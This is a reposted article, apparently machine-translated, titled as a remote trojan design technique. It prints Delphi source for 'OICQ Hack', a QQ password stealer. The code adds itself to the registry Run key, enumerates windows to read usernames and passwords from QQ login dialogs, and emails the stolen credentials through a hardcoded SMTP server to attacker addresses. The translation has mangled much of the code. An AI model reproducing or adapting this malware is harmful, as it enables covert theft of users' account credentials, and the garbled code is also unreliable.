OICQ Design Technology of Remote Trojan

zhaozj2021-02-11  160

{***************** OICQ Hack 2001 *********** * * 2001 5.22 Ver 1.1 Modify for OICQ2000B 0230 * 2001 5.25 Ver 1.2 Modify for QQ2000B 0430 * Last Updated: 2001.5.25 * Author: NJHACK * HACKSOFT Research Lab. * Copyright (c) 2001 AllRigths Reserved. * * ******************************** ************************} // --------------- below is OICQHACK.DPR project file program oicqhack; uses Windows, Messages, mainunit in 'mainunit.pas'; {$ R * .RES} var wClass: TWndClass; // class struct for main window Msg: TMSG; // message struct procedure ShutDown; begin UnRegisterClass (classname , Hinst); EXITPROCESS (HINST); // end program end; function windowProc (HWND, MSG, WPARAM, LPARAM: long): longint; stdcall; begin result: = defWindowProc (hwnd, msg, wparam, lparam); Case MSG Of WM_CREATE: WINCREATE; WM_TIMER: ONTIMER1; WM_DESTROY: Shutdown; End; End; begin // If the old version is running, stop the old program, only run the current new program hmain: = FindWindow ('Hacksoft-OICQ-Password-Recoder' , 'OICQ password record 1); if Hmain <> 0 Then SendMessage (LP, WM_DESTROY, 0); hinst: = getModuleHandle (NIL); // Get the application instance classname: = 'Hacksoft-OICQ-Password-Recoder'; with wClass do begin Style: = CS_PARENTDC; hIcon: = LoadIcon (hInst, 'MAINICON'); lpfnWndProc: = @WindowProc; hInstance: = hInst; hbrBackground: = COLOR_BTNFACE 1; lpszClassName: = classname; hCursor: = LoadCursor (0, IDC_ARROW); End; RegisterClass (WCLASS); hmain: = CreateWindowex (WS_EX_TOOLWINDOW, ClassName, 'OICQ Password Recorder 3', WS_OVERLAPPEDWINDOW, 10, 10, 10, 80, 0, 10, Hinst, NIL); // Establish a new Timer, used to schedule the window newtime: =

SetTimer (Hmain, 0,300, NIL); // Establish a message loop while (GetMessage (MSG, Hmain, 0)) DO Begin TranslateMessage (MSG); DISPATCHMESSAGE (MSG); end; // End Timer KillTimer (Hmain, NEWTIME); end. // ------- below is MainUnit.PAS unit file Unit Mainunit; Interface Uses Windows, Messages, Sysutils, Classes, Winsock, Registry; Const CRLF = # 13 # 10; var spy: string Hinst, Hmain, Newtime, Count, Start, Max, Fhand, Old, Olde, Lp: Integer; His: array [0..100] of integer; syspath: array [0..200] of integer; regservice: function (UTHREAD: INTEGER): Integer; stdcall; librandle: thandle; classname: array [0..100] of char; items: array [0..4] of string; err: integer; wsadata: twsadata; fsocket, fport, step: integer; SockAddrIn: TSockAddrIn; hackmail, email, newpass, fhost, s1, password: string; sbuf: array [0..1024] of char; procedure winCreate; procedure OnTimer1; implementation // modify the registry Let the program start procedure autorun; var REG: Tregistry; Begin Reg: = Tregistry.create; reg.rootkey: = hkey_local_machine; reg.openkey ('Software / Microsoft / Wi NDOWS / CURRENTVERSION / RUN ', TRUE; REG.WRITESTRING (' OICQPASS ', SPY ' OICQPASS.EXE '); reg.closekey; reg.free; end; // below is a sub-process of sending a letter, acquiring password Back Getoicq@21cn.com Email Procedure Mailsend; Begin Err: = RECV (FSocket, SBUF, 400, 0); S1: = STRPAS (SBUF); INC (Step); Case Step of 1: S1: = 'HELO SMTP. Hacker.com ' CRLF; 2: S1: =' Mail from: ' CRLF; 3: S1: =' RCPT TO: <' Email '> ' CRLF; 4: S1: = 'Data' CRLF; 5: S1: = 'from: "OICQ Hack" ' CRLF 'TO: "Getoicq" ' CRLF '

Subject: QQ2001 Password Come. ' CRLF CRLF NewPass CRLF '. ' CRLF; 6: S1: =' Quit ' CRLF; Else Step: = 0; End; Strcopy (SBUF, PCHAR (S1)) ; err: = send (FSocket, sbuf, strlen (sbuf), MSG_DONTROUTE); end; // main transmission process procedure SendPass; begin err: = WSAStartup ($ 0101, WSAData); FSocket: = socket (PF_INET, SOCK_STREAM, IPPROTO_IP ); // uses SMTP.21CN.com to send information fHOST: = '202.104.32.230'; fport: = 25; sockaddrin.sin_addr.s_addr: = inet_addr (pchar (fHOST)); sockaddrin.sin_family: = PF_INET; SOCKADDRIN .sin_port: = htons (fport); Err: = Connect (FSocket, SockAddrin, Sizeof (SockAddrin)); step: = 0; Repeat Mailsend; Until Step = 0; Err: = CloseSocket (fsocket); err: = wsacleanup; End; // window enumeration function function lpenumfunc (hwnd: integer; uint: integer): boolean; stdcall; var HW, Hwold, HS, Wlong, HUP, I: Integer; SBUF, SB3, SB2: Array [0 .. 256] of char; sb1: string; begin hwold: = getParent (hwnd); wlong: = getWindowlong (hwnd, gwl_style); if (Wlong and ES_Password) <> 0 THEN Begin // Check if OICQ login hup: = getParent (hw); sendMessage (hup, wm_gettext, 100, integer (@sbuf)); strpcopy (SB2, 'OICQ Registration Wizard'); strpcopy (SB3, 'QQ Registration Wizard " ); IF (STRComp (SBUF, SB2) = 0) or (Strcomp (SBUF, SB3) = 0) The begin = getParent (HUP); OLD: = getParent (OLD); OLD: = getParent (OLD); START: = 0; count: = 1; //Items.clear; // Skip two windows hwnd: = getWindow (hwnd, gw_hwndfirst); hwnd: = getWindow (hwnd, gw_hwndnext);

// Name hWnd: = getWindow (hwnd, gw_hwndnext); hw: = getWindowTextLength (hw); hs: = integer; sendMessage (hwnd, wm_gettext, 100, hs); items [0]: = ' Username: ' strpas (sbuf); // Get a password hWnd: = getWindow (hwnd, gw_hwndnext); hw: = getWindowTextLength (hwnd); hs: = integer; sendMessage (hwnd, wm_gettext, 100, HS); hs: = integer; sendMessage ); Items [1]: = 'password:' strpas (sbuf); end; strpcopy (SB2, 'OICQ user login'); strpcopy (SB3, 'QQ user login'); if (Strcomp (STRComp (SBUF, SB2) = 0) OR (Strcomp (SBUF, SB3) = 0) The begin = getParent (HUP); OLD: = getParent (OLD); start: = 0; count: = 1; //Items.clear; // Get the username hWnd: = getWindow (hwnd, gw_hwndfirst); hw: = getWindowTextLength (hw); hs: = integer; sendMessage (hwnd, wm_gettext, 100, hs); items [0]: = 'user name : ' StrPas (SBUF); // Get a password hWnd: = getWindow HW: = getWindowTextLength (hw); hs: = integer (@sbuf); sendMessage (hwnd, wm_gettext, 100, hs); items [1]: = 'password:' strpaas (sbuf); end End; // Check if online hw: = getWindowTextLength (hw); hs: = integer; sendMessage (hwnd, wm_gettext, 100, hs); strpcopy (SB2, 'online'); strpcopy (SB3, ' Stealth '); if (strcomp (sbuf, sb2) = 0) or (Strcomp (SBUF, SB3) = 0) THEN Begin if hwold = il = old the beginning

Old The Begin if strcomp (SBUF, SB2) = 0 Then Items [2]: = 'Login Success: Online' Else Items [Successful: = 'Successful: Steady'; items [3]: = '; // Password sent back to my email getoicq@21cn.com newpass: = format ('% s% s% s% s', [items [0], items [1], items [2], items [3], Items [ 4]); // Hackmail: = email; sendpass; email: = 'mf001@tang.com'; sendpass; email: = Hackmail; // Password storage to OICQPass.dll {if FileExists (SPY 'OICQPass.dll' ) = false then fhand: = filecreate (spy 'oicqpass.dll') else fhand: = fileopen (spy 'oicqpass.dll', fmOpenWrite); if fileexists (spy 'oicqpass.dll') = false then fhand: = filecreate ( SPY 'OICQPass.dll') Else Fhand: = FileOpen (SPY 'OICQPass.dll', Fmopenwrite); Fileseek (Fhand, 0, 2); Strpcopy (SBUF, Items [0] # 13 # 10 items [1] # 13 # 10 Items [2] # 13 # 10 items [3] # 13 # 10); FileWrite (FHAND, SBUF, Strlen); FileClose (FHAND);} end; OLDE: = OLD; End; end; result: = true; end; timer response function procedure Ontimer1; begin lp: = 0; enumChildWindows (GETDESKTOPWINDOW, @ lpenumfunc, lp); END; // Create a response function Procedure WinCreate; Var Wlong: Integer; S1: String; S2, S3, SBUF: Array [0..300] of char; i: integer; osver : Tosversioninfo; tmp: tmemorystream; begin // get the operating system version information, if Win9x is registered as the service process, NT No this feature osver.dwosveionsInfosize: =

转载请注明原文地址:https://www.9cbs.com/read-5560.html

New Post(0)